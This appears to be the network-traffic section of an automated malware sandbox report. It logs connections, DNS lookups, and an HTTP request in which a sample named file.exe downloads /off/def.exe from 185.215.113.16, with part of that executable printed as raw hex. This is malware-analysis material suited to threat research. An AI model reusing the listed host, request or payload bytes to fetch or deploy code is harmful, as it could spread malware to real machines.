                                                                                                                                                                                          Nov 23, 2024 17:46:05.364234924 CET49999443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.364244938 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.364263058 CET49999443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.364268064 CET4434999913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.366694927 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.366739988 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.366811037 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.366936922 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.366950035 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.449579000 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.449676037 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.449758053 CET49998443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.449995041 CET49998443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.450004101 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.450018883 CET49998443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.450023890 CET4434999813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.453732967 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.453794956 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.453943014 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.454154015 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.454169989 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.643954039 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.647138119 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.647232056 CET50000443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.647286892 CET50000443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.647286892 CET50000443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.647306919 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.647327900 CET4435000013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.650877953 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.650938988 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:05.651015997 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.651262045 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:05.651278019 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.080382109 CET4435000113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.080883026 CET50001443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.080915928 CET4435000113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.081394911 CET50001443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.081401110 CET4435000113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.091151953 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.091552019 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.091583967 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.092000961 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.092011929 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.213371038 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.215837955 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.215858936 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.216337919 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.216344118 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.227229118 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.227617979 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.227631092 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.228051901 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.228058100 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.525165081 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.528230906 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.528285027 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.528417110 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.528439045 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.528481960 CET50002443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.528490067 CET4435000213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.532434940 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.532468081 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.532634974 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.532794952 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.532807112 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.533036947 CET4435000113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.535979033 CET4435000113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.536045074 CET4435000113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.536098003 CET50001443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.537991047 CET50001443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.538000107 CET4435000113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.538023949 CET50001443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.538028002 CET4435000113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.539530993 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.539904118 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.539961100 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.540437937 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.540452003 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.540724993 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.540786982 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.543375015 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.543488979 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.543519020 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.671751976 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.674909115 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.674979925 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.675091028 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.675105095 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.675138950 CET50003443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.675143957 CET4435000313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.678101063 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.678189993 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.678276062 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.678581953 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.678618908 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.704205990 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.707364082 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.707417965 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.707447052 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.707461119 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.707469940 CET50004443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.707475901 CET4435000413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.710372925 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.710414886 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.710580111 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.710783005 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.710796118 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.992809057 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.995973110 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.996033907 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.996056080 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.996088982 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.996150017 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.996171951 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.996186018 CET50005443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.996193886 CET4435000513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.999588966 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.999669075 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:07.999747992 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.999943018 CET50010443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:07.999974966 CET4435001013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.344085932 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.344655037 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:09.344728947 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.345149040 CET50007443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:09.345165014 CET4435000713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.383049965 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.383619070 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:09.383641958 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.384211063 CET50006443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:09.384217024 CET4435000613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.461354017 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.461889029 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:09.461922884 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.462397099 CET50008443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:09.462404013 CET4435000813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.504723072 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.505660057 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:09.505691051 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:46:09.506114960 CET50009443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:46:09.506124020 CET4435000913.107.246.63192.168.2.5
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Nov 23, 2024 17:44:00.271620035 CET5003153192.168.2.51.1.1.1
                                                                                                                                                                                          Nov 23, 2024 17:44:00.525439978 CET53500311.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:42.589131117 CET53505201.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:42.609824896 CET53521491.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:46.003068924 CET53520181.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:46.656320095 CET5885153192.168.2.51.1.1.1
                                                                                                                                                                                          Nov 23, 2024 17:44:46.656672001 CET5942553192.168.2.51.1.1.1
                                                                                                                                                                                          Nov 23, 2024 17:44:46.842438936 CET53588511.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:46.842963934 CET53594251.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.823292971 CET5786153192.168.2.51.1.1.1
                                                                                                                                                                                          Nov 23, 2024 17:44:49.823484898 CET5944553192.168.2.51.1.1.1
                                                                                                                                                                                          Nov 23, 2024 17:44:58.255587101 CET53574211.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:01.541588068 CET5135753192.168.2.51.1.1.1
                                                                                                                                                                                          Nov 23, 2024 17:45:01.541733027 CET5673953192.168.2.51.1.1.1
                                                                                                                                                                                          Nov 23, 2024 17:45:03.206135035 CET53594891.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:22.048223972 CET53652171.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:42.110573053 CET53561991.1.1.1192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:45:44.759634972 CET53515721.1.1.1192.168.2.5
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Nov 23, 2024 17:44:00.271620035 CET192.168.2.51.1.1.10x3c1cStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:46.656320095 CET192.168.2.51.1.1.10x8781Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:46.656672001 CET192.168.2.51.1.1.10xc65aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:49.823292971 CET192.168.2.51.1.1.10x7edeStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:49.823484898 CET192.168.2.51.1.1.10x52eStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:45:01.541588068 CET192.168.2.51.1.1.10xec67Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:45:01.541733027 CET192.168.2.51.1.1.10xaa05Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Nov 23, 2024 17:44:00.525439978 CET1.1.1.1192.168.2.50x3c1cNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:00.525439978 CET1.1.1.1192.168.2.50x3c1cNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:46.842438936 CET1.1.1.1192.168.2.50x8781No error (0)www.google.com216.58.208.228A (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:46.842963934 CET1.1.1.1192.168.2.50xc65aNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:49.966386080 CET1.1.1.1192.168.2.50x7edeNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:49.966386080 CET1.1.1.1192.168.2.50x7edeNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:49.966386080 CET1.1.1.1192.168.2.50x7edeNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:49.966386080 CET1.1.1.1192.168.2.50x7edeNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:49.968786001 CET1.1.1.1192.168.2.50x52eNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:49.968786001 CET1.1.1.1192.168.2.50x52eNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:50.208666086 CET1.1.1.1192.168.2.50x37adNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:50.364725113 CET1.1.1.1192.168.2.50x54eeNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:50.364725113 CET1.1.1.1192.168.2.50x54eeNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:50.364725113 CET1.1.1.1192.168.2.50x54eeNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:53.360441923 CET1.1.1.1192.168.2.50x1fe4No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:53.360511065 CET1.1.1.1192.168.2.50x87d3No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:53.360511065 CET1.1.1.1192.168.2.50x87d3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:44:53.360511065 CET1.1.1.1192.168.2.50x87d3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:45:01.784979105 CET1.1.1.1192.168.2.50xaa05No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Nov 23, 2024 17:45:01.949174881 CET1.1.1.1192.168.2.50xec67No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          • property-imper.sbs
                                                                                                                                                                                          • slscr.update.microsoft.com
                                                                                                                                                                                          • otelrules.azureedge.net
                                                                                                                                                                                          • https:
                                                                                                                                                                                            • js.monitor.azure.com
                                                                                                                                                                                            • wcpstatic.microsoft.com
                                                                                                                                                                                          • fs.microsoft.com
                                                                                                                                                                                          • 185.215.113.16
                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.549732185.215.113.1680828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Nov 23, 2024 17:44:28.560547113 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030491114 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:29 GMT
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Content-Length: 2784256
                                                                                                                                                                                          Last-Modified: Sat, 23 Nov 2024 16:30:17 GMT
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          ETag: "67420319-2a7c00"
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 d0 ae 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                          Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ +*`Ui` @ @.rsrc`2@.idata 8@lwvfpqpj **:@nnhflwrw *V*@.taggant@*"Z*@
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030577898 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030601978 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030620098 CET672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030635118 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030653954 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030713081 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030730009 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030747890 CET1236INData Raw: 06 67 6f 2c 3f c4 4e b2 fc e2 e4 29 ef d5 87 01 34 c4 4b 92 9c f1 bd b1 fc e2 e4 9b ed d9 87 b1 2f c4 71 30 0d 95 08 3a de 19 69 c9 cf ea e9 4f ee dd d2 b2 8c c4 01 3a da b3 6b 82 94 d6 1e 7f f7 7f 65 31 4f ee e5 09 0f fb 6f 07 2e df 08 b6 5d c1
                                                                                                                                                                                          Data Ascii: go,?N)4K/q0:iO:ke1Oo.]V{B4uTF0fipzC-3?V{+n9fWjp=h(iNNKEQCq_G1q*is|ebg2o&Bv8j
                                                                                                                                                                                          Nov 23, 2024 17:44:30.030766010 CET1236INData Raw: c5 d7 51 4d ea e9 b2 3a 86 09 73 63 65 0a ed 0d 96 13 9d 43 7e 83 97 7d 44 12 74 22 07 a1 a4 d3 f5 b7 59 c2 fa 2f af db fe 45 35 62 18 36 8c 84 8d 63 a6 f8 34 66 8d 82 4d c2 fa 6a 07 0b fb e7 4b ba 60 78 07 4e 9b be ab 05 7d ff 24 45 a6 30 3b ba
                                                                                                                                                                                          Data Ascii: QM:sceC~}Dt"Y/E5b6c4fMjK`xN}$E0;,jQvWImbN_rPmtut@Qp8YRv_m?`#V+Z9eT b4]#J5_\^.:jQi'(Tdnk6DT:^*
